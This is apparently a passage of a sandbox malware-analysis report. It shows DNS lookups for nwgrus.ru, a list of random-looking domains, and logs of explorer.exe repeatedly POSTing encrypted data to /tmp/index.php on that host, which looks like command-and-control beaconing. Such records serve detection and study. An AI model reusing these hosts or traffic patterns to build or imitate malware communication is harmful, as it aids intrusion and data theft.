Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350683928 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	189.163.45.204	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	187.228.112.175	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	148.255.44.91	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	186.123.165.48	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.146.112.188	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:37:51.350713968 CEST	1.1.1.1	192.168.2.8	0xebcb	No error (0)	nwgrus.ru	189.163.45.204	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:38:43.858412027 CEST	1.1.1.1	192.168.2.8	0x748d	No error (0)	calvinandhalls.com	23.145.40.162	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	109.121.204.14	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	190.13.174.94	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	190.156.239.49	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	190.249.193.233	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	189.163.45.204	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	187.228.112.175	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	211.202.224.10	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	148.255.44.91	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	186.123.165.48	A (IP address)	IN (0x0001)	false
Sep 30, 2024 15:40:23.498295069 CEST	1.1.1.1	192.168.2.8	0x9450	No error (0)	nwgrus.ru	190.146.112.188	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

23.145.40.164

https:

calvinandhalls.com

dhwuphumqtqn.com

nwgrus.ru

tkpgpviexggpuwvs.net

jrbmtindhjismyee.com

ynepfbdxkuieepaf.net

xkxmfugtrnxonclj.com

ymeegmcrvikfsv.org

qnssdnlxskerq.com

vpprwqijyswgyjvy.com

ayjhmseqvvjye.com

bnqsjigsukajkt.org

ejrqbeuhiivimsok.org

yanbtiwxewyyhy.com

frpabbqmujgvx.net

ybeufjfqrbhah.org

astksdjaitsnxo.com

ssdmhljrxull.net

mshenhcpddejse.org

pjefvbuybfqlgx.org

fufaecmkeyed.org

naauncqsbvtxnxe.net

lcpcrwvedbvpllck.net

lgertcnwaskqpc.com

fevqsrdkflt.net

drnpfojnpvggv.org

ibetbbesaakqkq.net

tyqfkmhoepxpii.net

wyjfuitjcdhsl.com

ecpjrwjcauix.com

bxntarqqdjdvdpxp.net

blfmqjnqqyje.org

gieuyuggiqfgtm.com

eankyeljcevd.net

luejdvwxxrcvrqdh.com

svfopofgftavf.com

bprjpwpsmmrgaa.org

ocnxfkuqumobjmad.net

dxdhacbibrdlwrt.com

nlmsxhroxptelhd.org

hikneccvvrshgb.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:37:51.359580994 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dhwuphumqtqn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 258 Host: nwgrus.ru
Sep 30, 2024 15:37:51.359603882 CEST	258	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 53 a2 e5 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA .[k,vu)SRqNk{]e0"'^g4{LPCZVo1;EirjahHT3bHzb2'?i taQOFC#pnFB))
Sep 30, 2024 15:37:52.397855997 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:37:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:37:52.408180952 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tkpgpviexggpuwvs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 201 Host: nwgrus.ru
Sep 30, 2024 15:37:52.408200026 CEST	201	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 2b 0d f0 fb Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu+nZsT1=`z1B25ZYQH2@[a,'DJ-Qkno6
Sep 30, 2024 15:37:53.547043085 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:37:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49708	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:37:53.558628082 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jrbmtindhjismyee.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 291 Host: nwgrus.ru
Sep 30, 2024 15:37:53.558648109 CEST	291	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 78 24 a2 be Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vux$l^WGW~=s;gM[9q_T(;[W"UydElp0@AMNX7'2b4NaPG~ct6f
Sep 30, 2024 15:37:54.521413088 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:37:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49709	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:37:54.581722021 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ynepfbdxkuieepaf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 260 Host: nwgrus.ru
Sep 30, 2024 15:37:54.581734896 CEST	260	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5e 28 ef 95 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu^(hsApmeAu[[4g!A\|_08RlK=Gd{34zg[27&s;/X*3/~u@>:T9n\|z)O}
Sep 30, 2024 15:37:55.560359001 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:37:55 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49710	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:37:55.584212065 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xkxmfugtrnxonclj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 175 Host: nwgrus.ru
Sep 30, 2024 15:37:55.584223986 CEST	175	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 26 3a f3 fa Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu&:nQGcbo& ..] Rkl<GX&XE>/EB3*=.}T_0
Sep 30, 2024 15:37:56.721446991 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:37:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49711	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:37:56.729541063 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ymeegmcrvikfsv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: nwgrus.ru
Sep 30, 2024 15:37:56.729566097 CEST	323	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 3e 5e bd bc Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu>^ZZsWfP9+3?0xm4\|A^-05]M;E+X::BO%@`L{(mZ(GCT;XyWhe67~
Sep 30, 2024 15:37:57.721139908 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:37:57 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49712	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:37:57.894596100 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qnssdnlxskerq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 339 Host: nwgrus.ru
Sep 30, 2024 15:37:57.894619942 CEST	339	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 77 50 cd 99 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuwPwWWvv6aK;sJR[ifH&N\@w&NDDOEP-VFPl}Ez\KdoW%oWKs
Sep 30, 2024 15:37:58.851171017 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:37:58 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49713	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:37:58.874209881 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vpprwqijyswgyjvy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 278 Host: nwgrus.ru
Sep 30, 2024 15:37:58.874500036 CEST	278	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 70 48 b7 92 Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vupHc5YFbRdAcx5aAYGBZP?,v 8*yZG!$8 ilTD1ELaE{r%<e
Sep 30, 2024 15:37:59.877990961 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:37:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49714	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:37:59.906555891 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ayjhmseqvvjye.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 165 Host: nwgrus.ru
Sep 30, 2024 15:37:59.906584024 CEST	165	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 53 35 b4 af Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuS5hA1jG.ov7w69[&wI=/2F4WYoh^Ota(
Sep 30, 2024 15:38:00.864689112 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49715	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 15:38:00.890818119 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bnqsjigsukajkt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 358 Host: nwgrus.ru
Sep 30, 2024 15:38:00.890835047 CEST	358	OUT	Data Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 4d 48 dd ed Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuMH}3XbO`?JZQ6ge@@TX\W?A,$VOxb,"y]2[+vDZ&HO1]dcRbz%@`cuC&!'"&
Sep 30, 2024 15:38:01.849919081 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 30 Sep 2024 13:38:01 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49716	187.228.112.175	80	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
